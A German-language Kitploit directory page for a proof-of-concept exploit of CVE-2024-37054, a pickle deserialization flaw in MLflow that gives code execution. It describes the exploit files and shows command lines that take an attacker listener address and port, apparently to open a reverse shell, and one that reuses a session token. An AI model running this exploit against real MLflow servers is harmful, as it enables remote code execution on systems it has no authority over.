Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-37054-PoC — PoC für CVE-2024-37054 | Kitploit
Tools/GitHubGitHub/jimmexploit/cve-2024-37054-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubjimmexploit/cve-2024-37054-poc

CVE-2024-37054-PoC

PoC für CVE-2024-37054

Repository anzeigen
6vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

Proof of Concept für CVE-2024-37054, eine kritische Deserialisierungsschwachstelle in MLflow-Versionen 0.9.0 bis 2.14.1. Wenn ein bösartiges pyfunc-Modell über mlflow.pyfunc.load_model() geladen wird, führt das gepicklete Payload beliebigen Code aus.

Dateien

  • exploit.py — vollständiger Exploit: registrieren, trainieren, hochladen, auslösen (für HTB SmartHire Machine)
  • build_model.py — böswilliges Modell lokal erstellen (nur Erstellung)

Verwendung

Modell lokal erstellen

root@kitploit:~
python3 build_model.py --lhost YOUR_IP --lport 4444

Vollständigen Exploit ausführen

root@kitploit:~
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz

# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."

Haftungsausschluss

Nur für Bildungszwecke und autorisierte Penetrationstests.

Tool herunterladen